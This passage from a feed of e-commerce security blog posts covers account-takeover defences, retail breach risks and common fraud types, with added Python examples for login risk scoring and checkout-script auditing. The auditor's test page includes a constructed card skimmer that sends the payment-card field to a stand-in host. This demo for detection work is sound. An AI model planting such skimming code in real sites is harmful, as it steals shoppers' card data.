1. Stop ATO up front. Don’t wait until checkout to put up your defenses. Start right out of the gate by protecting the sign-up and login process. Putting in safeguards at the first point of entry helps dramatically ease the burden at checkout. We’ve consistently seen about a 35% reduction in ATO at checkout among merchants that add login protection.

2. Block bot attacks. Bots are everywhere, wreaking havoc at account creation, checkout and points in between. Because bots are designed to work at scale, once they find a way in they keep coming until they’re stopped. But if you show bots that they’re not going to get in, they’ll simply move on to a softer target. When you can identify and block bad bots successfully, ATO attempts will go down.

3. Use friction judiciously. Not all friction is created equal, and applying friction only where it’s appropriate – usually at login – gives a customer a chance to prove themselves and ensures you’re not letting in the wrong person. For instance, implementing multi-factor authentication (MFA) has proven to be highly effective for our merchants. Some two-thirds of MFA challenges failed, confirming the block was in the right place, and the remaining third was able to continue their journey without further hiccups.
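As an added illustration of the three points above (example code written for this page, not Forter’s or the author’s), here is a small login-time risk engine in Python. It blocks a source that is clearly stuffing credentials (many distinct accounts, mostly failing, from one IP), denies wrong passwords as usual, and steps a correct password up to an MFA challenge only when the account or the source looks suspicious. The thresholds, IP addresses, usernames and events are constructed assumptions and would need tuning for a real site.

```python
"""Login-time risk scoring: block credential-stuffing sources at the front
door and add MFA friction only to risky-but-valid logins.  All thresholds
and sample events below are assumptions made for this example."""
from collections import defaultdict, deque

WINDOW_S = 600               # look-back window in seconds (assumed)
MAX_FAILS_PER_ACCOUNT = 5    # failed logins on one account before MFA (assumed)
MAX_ACCOUNTS_PER_IP = 10     # distinct accounts tried from one IP before block (assumed)
MIN_ATTEMPTS_FOR_RATE = 8    # attempts from one IP before the fail-rate rule applies (assumed)
FAIL_RATE_BLOCK = 0.8        # failure ratio that marks an IP as a stuffing source (assumed)
MFA_ACCOUNTS_PER_IP = 3      # distinct accounts from one IP that make a good login suspicious (assumed)


class LoginRiskEngine:
    def __init__(self):
        self.by_ip = defaultdict(deque)     # ip -> deque of (ts, user, password_ok)
        self.by_user = defaultdict(deque)   # user -> deque of (ts, password_ok)
        self.blocked_ips = set()            # in production this would be a cache with a TTL

    @staticmethod
    def _trim(dq, now):
        # Drop events that fell out of the look-back window.
        while dq and now - dq[0][0] > WINDOW_S:
            dq.popleft()

    def evaluate(self, ts, ip, user, password_ok):
        """Decide one login attempt: 'block', 'deny', 'mfa' or 'allow'."""
        if ip in self.blocked_ips:
            return "block"
        ip_q, user_q = self.by_ip[ip], self.by_user[user]
        self._trim(ip_q, ts)
        self._trim(user_q, ts)

        attempts = len(ip_q)
        fails = sum(1 for _, _, ok in ip_q if not ok)
        distinct = len({u for _, u, _ in ip_q})

        # Bot signal: one source hammering many accounts, mostly failing.
        stuffing = distinct >= MAX_ACCOUNTS_PER_IP or (
            attempts >= MIN_ATTEMPTS_FOR_RATE and fails / attempts >= FAIL_RATE_BLOCK)
        if stuffing:
            self.blocked_ips.add(ip)
            return "block"

        user_fails = sum(1 for _, ok in user_q if not ok)
        ip_q.append((ts, user, password_ok))
        user_q.append((ts, password_ok))
        if not password_ok:
            return "deny"

        # Correct password, but add friction if the account or the source looks off.
        if user_fails >= MAX_FAILS_PER_ACCOUNT or distinct >= MFA_ACCOUNTS_PER_IP:
            return "mfa"
        return "allow"


def run(events):
    """Evaluate a sequence of (ts, ip, user, password_ok) events in order."""
    engine = LoginRiskEngine()
    return [engine.evaluate(*event) for event in events]


# Constructed sample events (documentation-range IPs, made-up users):
#   alice logs in normally; one IP walks a stolen credential list across
#   12 accounts and gets one hit; bob fumbles his password five times.
SAMPLE_EVENTS = (
    [(0, "198.51.100.7", "alice", True)]
    + [(10 + i, "203.0.113.5", f"user{i:02d}", i == 4) for i in range(12)]
    + [(30 + i, "192.0.2.9", "bob", i == 5) for i in range(6)]
)

if __name__ == "__main__":
    for event, decision in zip(SAMPLE_EVENTS, run(SAMPLE_EVENTS)):
        print(f"{decision:5s} {event}")
```

The stuffing source gets its one correct guess challenged with MFA (four other accounts had already been tried from that IP) and is blocked outright once its failure rate is visible, while bob’s correct password after five failures is allowed through only after MFA. Nothing is decided at checkout; the signal is all collected at sign-in, which is the point of strategy 1.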

With strong and ongoing growth in e-commerce, ATO fraud will remain a huge risk for online merchants. The good news is there are many ways you can protect your business – and your customers – at every critical point along the digital journey.

The post Three Ways to Stop ATO Attacks in Their Tracks appeared first on Cybersecurity Insiders.

By Rafael Lourenco, EVP & Partner, ClearSale

Cybersecurity attacks against businesses are unrelenting, and while retail and ecommerce typically focus on fraud prevention, they’re often targets of other digital attacks as well. For example, the 2022 Verizon Data Breach Investigations Report (DBIR) documented 241 confirmed retail data breaches in 2021, resulting in stolen credentials, personal information, and payment data. At the same time, 56% of Merchant Risk Council members reported phishing attacks in 2022, which can lead to data theft, malware attacks, and fraud.

These cybercrimes have costly consequences for businesses. The average cost of a data breach worldwide in 2022 is $4.35 million, a figure that could easily put a smaller retailer out of business and create budgetary problems for a larger retailer. These numbers show why it’s so important for ecommerce businesses and retailers to maintain a culture of security that includes — but also goes beyond — fraud prevention.

A focus on security is important for retailers of all sizes, even small ones. It’s always been clear that fraudsters and criminals prefer to target businesses that they suspect have weak or outdated security, which usually means smaller businesses that lack the resources to have a large in-house security team. For example, the DBIR found that of 620 documented incidents against retailers, 157 targeted companies with fewer than 1,000 employees, compared to 68 incidents aimed at retailers with more than 1,000 employees (the size of the other 404 companies wasn’t known).

Among confirmed breaches at retailers whose size was known, 54 companies had fewer than 1,000 employees, compared to 35 larger companies. Smaller retailers, therefore, can’t assume that their size or lower profile compared to major retailers will protect them. There is no “security through obscurity” for B2C companies.

Common cybersecurity attacks on retailers

The DBIR lists system intrusion, social engineering, and web app attacks as the most common attack patterns involved in retail data breaches in 2021. Once attackers made it into their victims’ systems, their most common actions were hacking and launching malware — especially malware designed to scrape payment data from web apps. This kind of attack can lead to costly brand damage and loss of customer trust. 84% of online shoppers in five countries surveyed by ClearSale in March 2021 said they would never shop again with a website that allowed a fraudster to use their credit card information.

Data-scraping malware (web skimmers injected into checkout pages) can be caught with continuous scanning of your site’s scripts, so that unauthorized code is detected and removed as soon as it appears rather than after customers’ cards have been stolen. Malware prevention also relies on employees who are educated about email threats and how to avoid them.
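One way to do that kind of scanning, as an added example that is not ClearSale’s or the article’s own code: take a baseline inventory of the scripts on the approved checkout page and re-audit the live page against it, flagging any script that was not approved and any external script that is loaded without a Subresource Integrity attribute. The page contents, host names and the placeholder integrity value below are constructed for the example; a real deployment would fetch the live page on a schedule and feed the same function.

```python
"""Checkout-page script inventory check against an approved baseline.
Flags external scripts not in the baseline, external scripts without an
SRI integrity attribute, and inline scripts whose content is not approved.
Added example; the HTML, host names and integrity value are constructed."""
import base64
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collects every <script> tag: src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        # html.parser hands script content to handle_data as raw text.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def sri_digest(text):
    """SRI-style digest (sha384, base64) of a script body."""
    digest = hashlib.sha384(text.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def collect_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def build_baseline(approved_html):
    """Record the approved page's external script URLs and inline script digests."""
    scripts = collect_scripts(approved_html)
    return {
        "external": {s["src"] for s in scripts if s["src"]},
        "inline": {sri_digest(s["body"]) for s in scripts if not s["src"]},
    }


def audit_page(html, baseline):
    """Return a list of findings for a (possibly tampered) live page."""
    findings = []
    for s in collect_scripts(html):
        if s["src"]:
            if s["src"] not in baseline["external"]:
                findings.append("unknown external script: " + s["src"])
            if not s["integrity"]:
                findings.append("no integrity attribute: " + s["src"])
        elif sri_digest(s["body"]) not in baseline["inline"]:
            findings.append("unapproved inline script: " + s["body"].strip()[:60])
    return findings


# Constructed checkout page as approved by the site owner.  The integrity
# value is a placeholder, not a real digest of any file.
APPROVED_HTML = """<html><body>
<form id="pay"><input name="pan"><input name="cvv"><button>Pay</button></form>
<script src="https://cdn.shop.example/checkout.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script>window.checkoutConfig = {currency: "USD"};</script>
</body></html>"""

# The same page after a constructed skimming injection: a new inline script
# exfiltrates the card number on submit, and an extra script is pulled from
# a host the site never approved, with no integrity attribute.
TAMPERED_HTML = APPROVED_HTML.replace("</body>", """<script>
document.getElementById("pay").addEventListener("submit", function () {
  new Image().src = "https://cdn-stats.example/c?" +
    encodeURIComponent(document.forms.pay.pan.value);
});
</script>
<script src="https://cdn-stats.example/t.js"></script>
</body>""")

if __name__ == "__main__":
    baseline = build_baseline(APPROVED_HTML)
    for finding in audit_page(TAMPERED_HTML, baseline):
        print("FINDING:", finding)
```

The check is deliberately strict: any inline script not seen in the baseline is reported, which means a legitimate deployment also trips it until the baseline is regenerated. That is the desired behaviour for a payment page, where the set of scripts should change only through a reviewed release.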

Provide security awareness training for retail employees

Social engineering attacks can take many forms, including multiple varieties of phishing. One common mode of attack is to impersonate a professional service that many businesses rely on, like Microsoft, Gmail, or a shipping company. The attackers send emails that include the company logo, a display name that appears to come from the real company, and a request to log in for a policy update, password change, or some other “critical” task. Then they steal the credentials to commit fraud, spread malware, or steal protected information.

Encourage your employees to report any suspicious emails to your security team before they click on any links or open any attachments. When your security analysts find phishing emails, they can save them to use in training so that your employees can see exactly what to look out for and what types of attacks are trending now.

Review your access control management policies and practices

The pandemic pushed many retailers to a work-from-home model for some or all of their employees. The result is that people may be accessing company systems from a variety of devices, over many different networks. This approach can increase the risk that an attacker — perhaps someone who launched a successful phishing attack or who intercepted a communication over a public Wi-Fi network — can access those company systems and move between them causing damage and stealing data.

If your company has policies on what types of devices and networks employees can use to log in to work, it might be worth reviewing them to see if they need updating. If your business has no such policy, it’s time to start creating one. Ideally, your employees would only use company-issued devices and log in over a company VPN. At a minimum, they should avoid working over unsecured Wi-Fi networks and make sure their home router’s default password has been changed.

Your company’s IT person or team can also review who has access to each of your company’s systems and then set appropriate controls based on job role or department. For example, your warehouse team does not need access to your company’s financial database, and your entry-level employees don’t need access to your executive team’s files. Setting these controls and removing employees’ access completely when they leave the company can prevent intrusions from spreading and avoid internal breaches.

It’s also wise to periodically review the settings on all your company’s software, operating systems, cloud storage, and hardware to ensure that access is private and limited to the employees who are authorized to use it. More than 10% of 2021 breaches were caused by errors including misconfigured cloud storage, per the DBIR.

Preventing attacks that can lead to data breaches, fraud, and brand damage requires an ongoing commitment to thinking about security and talking about it with your employees. While retailers are rightly concerned with preventing transaction fraud, it’s important to build and maintain a company culture focused on the full range of security awareness and best practices.

The post Cybersecurity Retail Risk Trends to Watch Now and in 2023 appeared first on Cybersecurity Insiders.

By: Oksana Balytsky, director of product marketing, Forter

E-commerce is expected to account for nearly a quarter (22%) of all retail sales by 2023 — a 7.9% jump from 2019.

As consumers fully embrace the digital age, e-commerce is expected to thrive and is likely to become the primary method of purchasing. By 2024, global e-commerce sales are expected to reach $6 trillion.

While the increase in e-commerce transactions is great for retailers, it also brings about another problem: e-commerce fraud.

Why Retailers Need to Be on the Lookout for Fraud

E-commerce fraud seems fairly self-explanatory, but the reality is it covers a wide range of tactics used by fraudsters to target retailers. While brick-and-mortar stores are no strangers to scams, having policies in place to check for counterfeit bills and credit card fraud, e-commerce platforms aren’t as seasoned and have a whole new world of opportunities for bad actors to take advantage of.

Rewards, saved payment information and other convenient offerings may entice eager shoppers to give a certain retailer their business, but are avenues for fraudsters to take advantage of, should they gain access to legitimate customers’ account information.

With rising e-commerce transactions and retailers enhancing the digital experience to attract consumers, there are five common types of fraud that merchants should be on the lookout for:

  • Account Takeover

  • Card Testing

  • Interception

  • Chargebacks

  • Refund Fraud

Account Takeover Fraud

Hollywood has dramatized hackers. The common perception is that these cybercriminals are penetrating firewalls with lines of code and using complicated tactics to outsmart top-tier security products.

The reality? Most are just logging in.

Known as account takeover (ATO), this tactic is when scammers gain access to a legitimate customer’s login credentials. Fraudsters have a variety of ways to get a password, such as purchasing stolen passwords and security codes on the Dark Web, running phishing schemes or just good old-fashioned guessing.

Once ATO occurs, the scammer can change account details, make purchases, access other accounts if the compromised login has admin rights, and withdraw funds if the application allows it.

ATO is a form of identity theft, and victims may never trust the retailer again.

Card Testing Fraud

In addition to credentials, fraudsters can also purchase credit card numbers in bulk from the Dark Web for as little as $17. Scammers can also just steal them directly through phishing attacks.

To avoid initial suspicion, fraudsters typically start with small transactions on each card number to find out which ones are still valid and what their limits are. Once they know, they move on to larger purchases. By the time the merchant discovers it has been the target of card testing, the scammer has likely already done significant damage.

Interception Fraud

Interception fraud is when an individual purchases an item online with a stolen payment method but gives the retailer the cardholder’s legitimate, matching shipping and billing addresses, so that address checks pass. The goal is then to intercept the package before it reaches that address.

There are three ways this happens:

  1. The scammer knows the victim and is close enough to steal the package from the drop-off location.

  2. The scammer contacts a customer service representative at the retailer to change the address before the item ships.

  3. The scammer contacts the shipping company directly to reroute the package to a destination of their choice.

Chargeback or “Friendly” Fraud

Chargeback fraud is when a customer purchases a product or service and then contacts their credit card company to dispute the purchase, resulting in a “chargeback.”

Also called “friendly fraud,” these cases are interesting because they can result from a legitimate purchase that the customer simply doesn’t recognize on their statement. Despite the lack of malice, it is no less detrimental to e-commerce merchants, and at the end of the day it can still have a negative impact on the business-customer relationship.

Scammers also commit chargeback fraud intentionally by abusing dispute policies to get items for free, knowing the purchase will be refunded to their credit card. Retailers then lose out through:

  • Lost merchandise

  • Shipping costs

  • Chargeback fees

  • Banking fines

Refund Fraud

Refund fraud is when a scammer purchases a product or service with a stolen credit card and then has the purchase refunded to a card they control. Typically, fraudsters do this by telling the merchant that the refund has to be processed onto a new credit card because the original one has been closed.

It’s a tricky situation for merchants because it can be difficult to decipher which claims are legitimate and which ones are not.

Taking the Burden off Retailers

While retailers can conduct regular site security audits and train support teams to spot the signs of fraud, the burden shouldn’t rest on the retailers’ shoulders alone. Fraud prevention solutions can help automate scam detection. Machine-learning-based fraud prevention tools can significantly reduce the risk of fraud while keeping the customer’s shopping experience smooth.

It’s important to stay educated on the most common fraud tactics to stay aware, but a modern fraud prevention solution can help fill in the gaps and keep retailers’ teams focused on providing top-of-the-line products and services for consumers.

The post Breaking Down e-commerce Fraud – The Five Pillars of Fraud appeared first on Cybersecurity Insiders.